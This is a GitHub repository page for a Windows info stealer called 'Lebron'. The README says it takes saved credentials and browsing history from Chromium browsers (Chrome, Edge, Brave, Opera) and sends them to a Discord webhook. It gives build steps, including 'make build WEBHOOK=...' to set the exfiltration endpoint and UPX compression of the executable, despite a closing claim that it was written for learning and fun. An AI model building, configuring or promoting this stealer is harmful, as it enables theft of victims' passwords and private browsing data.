Skip to content

Chromium-based info stealer for windows, sends credentials & history via a discord webhook

License

Notifications You must be signed in to change notification settings

komodoooo/Lebron

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Lebron

image

A Chromium-based info stealer for windows, sends credentials & history via a discord webhook

The program currently supports the following broswers:

  • Chrome
  • Edge
  • Brave
  • Opera / GX
* only the stable versions of these broswers are actually supported

Compile

  1. Requirements
    Ensure the following tools are installed on your Windows machine:

    • go
    • make
    • upx

    You can use Scoop for easy installation of these dependencies.

  2. Set Up Dependencies
    Run the following command to set up the required dependencies:
    make setup

  3. Build and Compress
    Compile and compress the executable with the following command:
    make build WEBHOOK="YOUR_DISCORD_WEBHOOK"
    You can also set the compression level with COMPRESSION_LEVEL (1-9, default:7)

  4. Clean Up
    Once the build is complete, you can remove temporary files with:
    make clean

Notes

I based myself on various detailed reads i found online.
I just wrote this for learning & fun purposes.

About

Chromium-based info stealer for windows, sends credentials & history via a discord webhook

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published